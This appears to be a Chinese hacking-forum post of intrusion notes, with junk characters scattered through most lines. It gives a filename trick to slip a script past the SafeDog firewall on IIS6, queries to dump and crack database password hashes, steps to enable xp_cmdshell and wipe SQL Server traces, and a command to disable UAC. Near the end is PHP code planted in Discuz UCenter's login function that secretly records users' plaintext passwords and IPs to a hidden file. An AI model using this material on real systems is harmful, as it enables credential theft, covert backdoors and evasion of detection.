; D; L) c/ S, \! c! Z% p其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录5 K, v% S% ~6 i& k6 K
利用II6文件解析漏洞绕过安全狗代码:
6 U% I* x. G# X4 D* {5 t h;antian365.asp;antian365.jpg
+ N, b# m4 Z7 [+ Y6 b2 Q6 O9 W% d; Y2 I/ E! s
各种类型数据库抓HASH破解最高权限密码!
8 q3 v6 e" }# P6 W; f/ |! H1.sql server2000
# E1 N: ~7 N, mSELECT password from master.dbo.sysxlogins where name='sa'7 @( t& ?/ H K: O+ J% t9 h
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 L1 h g; Q/ {# C' { n0 e$ F$ P2FD54D6119FFF04129A1D72E7C3194F7284A7F3A& b z, c: s- S
5 n; z6 [ n) ~6 v
0×0100- constant header& x& p! l: _; K' C
34767D5C- salt
* ?2 `6 z3 D) B0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash7 T4 w# J3 v+ n" W% T+ L3 }
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash1 u2 O$ K$ B7 `& W0 @. b
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash p2 ^# Y6 l! J6 ^
SQL server 2005:-/ x) J' E, m y
SELECT password_hash FROM sys.sql_logins where name='sa' E w% N, J3 t% S0 ?
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0 Z5 e0 \: e) _ M) _( D2 w0×0100- constant header
6 j& e5 j" f6 v4 _* l993BF231-salt
, E. T& I/ u" t3 b+ s* L5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash9 ~6 I g- V9 e$ _' z
crack case sensitive hash in cain, try brute force and dictionary based attacks.
* R6 k' U: L$ J
& K* i9 @1 N; a6 L% P0 tupdate:- following bernardo’s comments:-
9 u( L; n0 C/ ^0 Tuse function fn_varbintohexstr() to cast password in a hex string.
- L2 M1 N) Z- `( @+ e$ ?e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins, f7 z; o$ H2 x+ A ]1 s
& i2 E f4 B& \MYSQL:-- Q% N3 f1 e8 p% S1 X
' x* [8 D2 L; o
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
9 t/ \* U5 m r0 k/ r1 Y+ A& g. l5 f8 I9 [4 b( B8 O4 O$ k
*mysql < 4.1' e- _6 o( a( o& b H" h4 }, ]
q" z6 q, z# i' u1 ]: c+ u6 Z* |
mysql> SELECT PASSWORD(‘mypass’);
1 G* J- q+ ~* U) D" V+——————–+
7 s) W. |2 l$ l0 j5 _| PASSWORD(‘mypass’) |
4 s) n! m& G; E! ^! |. b+——————–+% d5 ]4 s' P$ i$ W1 o& l4 ? o
| 6f8c114b58f2ce9e |
S# I8 g6 C" ^3 D' d+——————–+
7 ^ H; n6 t4 l; o0 l; w4 c1 m0 A& J) O. D% j2 d- m! [
*mysql >=4.1% ]; m, W7 O+ E& J) y. ^
$ K( Q. }, l4 T' J) [9 O
mysql> SELECT PASSWORD(‘mypass’);
. z7 @0 A+ {% f4 t+——————————————-+, R& k% y( r6 k7 ~0 i' I3 \- K
| PASSWORD(‘mypass’) |
/ j8 |( o w$ M% q# i, l1 E7 F. a+——————————————-+( f( B3 t# D1 v) R+ b
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |( `* J! I6 ^' g" f2 \
+——————————————-+
3 s1 c J' h/ W/ j' q- n/ h8 ]5 Y/ \" a5 F$ D8 x! \ @
Select user, password from mysql.user
" \0 E0 l t& @% L( XThe hashes can be cracked in ‘cain and abel’
; e" B* t! L0 K# m" j+ ?3 f( U5 w" J
Postgres:-
% p7 W, d$ a9 Y) D8 G% T! ^Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”). q. b0 Z4 H: u. M8 p0 y
select usename, passwd from pg_shadow;* G# ^- P" h; n" D$ r3 u' P0 K) I& l" u- C
usename | passwd5 \6 L/ f9 @; O0 m; u; o
——————+————————————-2 R5 a2 y' X# a
testuser | md5fabb6d7172aadfda4753bf0507ed4396
/ r0 @3 V6 }' @4 Ouse mdcrack to crack these hashes:-0 l! ~: S) h- }( G# E
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396, M7 |1 l* ?- v1 [: ]
$ }: r1 R9 k- `: QOracle:-
! [; H4 f6 L( d; d4 t4 S; Wselect name, password, spare4 from sys.user$
2 K, w: h& R; c4 k# ]6 t6 T/ Hhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g" J2 z6 W( c. p: u
More on Oracle later, i am a bit bored….) e1 A% ]. U( A- m( E5 Z
7 h$ x7 N/ J: d: T' Q! R z5 K/ [1 M
在sql server2005/2008中开启xp_cmdshell
$ J, Q' J" g( K. s: L" x) T% z-- To allow advanced options to be changed.2 p' z% N1 }9 t
EXEC sp_configure 'show advanced options', 1
. {, Y, \( S4 X7 ]GO" N% e3 r* v; I( q( ] ?- B
-- To update the currently configured value for advanced options.% s' j% {5 E# P+ |+ Y
RECONFIGURE
1 g9 o; ]* Q; U2 l3 d1 V a% L7 G% s- dGO/ Z% o B5 Q# d" A
-- To enable the feature.
: z, K* ]/ s8 M& R+ K$ |EXEC sp_configure 'xp_cmdshell', 1+ f8 c9 Z) O$ I% v: H
GO
5 b& X( p' o$ F/ |+ P-- To update the currently configured value for this feature.
, M; }3 z1 k5 h' x. s# tRECONFIGURE
# N; j7 k4 [/ A+ `0 d* c% SGO& p! `- L; e+ j# h' D1 E" p) t
SQL 2008 server日志清除,在清楚前一定要备份。% ~4 \4 u4 \2 n3 {) A
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:6 E$ s) O- ^4 b
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
+ J( y9 `: q( Y( F3 W1 F
3 A/ Y G! q3 a/ }0 m, `% m对于SQL Server 2008以前的版本:
4 R! o+ Y% L8 S) t1 v' _2 P% gSQL Server 2005:$ U+ d7 A5 K, t( A% @9 v
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
( [+ x0 q L+ f. [* S4 \SQL Server 2000:
) v: B, C2 O: H/ }* Q清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。+ k) S+ U! ^& L+ j) _/ K* v& r
" x: G; s+ n: u3 f本帖最后由 simeon 于 2013-1-3 09:51 编辑; |7 l2 Q, x2 M* f3 B3 P
+ u- h6 }0 a% U8 u5 o0 V% s- ~) {: U
, ?( P8 C5 J3 B+ y3 Kwindows 2008 文件权限修改
6 j T4 c8 ^1 S, i9 f; R/ g* N2 p1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
5 G: s! J( [$ X2 w4 c4 u- G2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98" F3 g" d! }, {* W- t
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
! a4 `3 l3 K, L/ _1 n1 j5 ^. \( A( m- r5 S- s" P5 n- i* X; s! c
Windows Registry Editor Version 5.00
" W1 z, {- N. [% r3 @# a% Q[HKEY_CLASSES_ROOT\*\shell\runas]
. |. C. @8 i- ` f@="管理员取得所有权"
& @* {* F' \1 g7 O. Z/ m"NoWorkingDirectory"="". w$ r! x& V& U! R& h
[HKEY_CLASSES_ROOT\*\shell\runas\command]
3 e- [5 r" @3 |( `( O' f@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! h7 c* x' F" {, L
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ K: I! h* ^% j& u' J2 t[HKEY_CLASSES_ROOT\exefile\shell\runas2]
( u; O, L3 R$ t3 E% C@="管理员取得所有权"8 R8 F) b) [* p8 H! `" L& l
"NoWorkingDirectory"=""
5 s" Q) g5 A8 N! H. w9 d& Q# X[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
) m3 J) }) d8 C3 R@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
m& v; g8 n6 }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( p6 [9 l& K; ~0 \$ M/ ?) i' e, f
[HKEY_CLASSES_ROOT\Directory\shell\runas]
4 H( j- T5 s' q: p& {7 R( ^2 l@="管理员取得所有权"4 Q: r8 e1 P) \$ D
"NoWorkingDirectory"=""0 c& e" w3 o8 {
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]: b: C2 l; B4 M2 U4 [) |
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 K) L5 @9 w- ]6 c# x
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"8 R! ]; h/ {/ E* H( ~4 n4 s
, `1 v- h, n' w1 P& }7 ^. I. m1 F9 |4 t
win7右键“管理员取得所有权”.reg导入
) S5 d2 m1 }+ Z9 I- L! z二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
0 i: _: W3 ?1 l& z$ I) E% P9 m1、C:\Windows这个路径的“notepad.exe”不需要替换8 u6 {& X7 v/ _- D; G1 I
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
2 c# m" p( s+ R/ ~3、四个“notepad.exe.mui”不要管; Q) p' {4 u+ h8 V# k7 m2 w1 X
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和4 ^. E+ R- Y8 C& \
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe” y* r/ A/ Y2 r7 d
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
& [5 |% e: }; E u: V6 u替换完之后回到桌面,新建一个txt文档打开看看是不是变了。/ I$ O1 R- B) \$ y0 s. h& M- v
windows 2008中关闭安全策略:
% V) j) b/ l) s* hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4 T3 P6 m$ d" I7 y( c修改uc_client目录下的client.php 在9 u, y* R$ ^; Q
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
" G) N" P4 x2 k3 R下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
2 T4 ]: a' w3 y. r. U: d你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw0 j1 S |6 l3 V4 w" B4 U# R
if(getenv('HTTP_CLIENT_IP')) {: ]! B! p; n, h5 L! k1 I6 P1 R
$onlineip = getenv('HTTP_CLIENT_IP');; L2 W7 R9 ]0 }) Z# X8 T0 [8 B% l4 T
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {. o3 m/ P) r/ L
$onlineip = getenv('HTTP_X_FORWARDED_FOR');( O) v% `7 q2 ^ u
} elseif(getenv('REMOTE_ADDR')) {
9 |6 Q/ b+ \! _: x8 H4 L* X$onlineip = getenv('REMOTE_ADDR');
4 `9 _5 O# a4 A* q9 d5 R} else {/ S! O& F8 j* x$ J0 F
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];) `3 n& S& B7 N7 K# p( m3 J7 {
}/ ?! h E/ x( c* e% l
$showtime=date("Y-m-d H:i:s");
5 ?9 d" q8 m/ G7 q: e7 C $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$ ]: g3 p) ^# \6 Z+ d0 R5 g $handle=fopen('./data/cache/csslog.php','a+');
4 O5 ]! i7 T5 ?! T$ p6 n- m $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对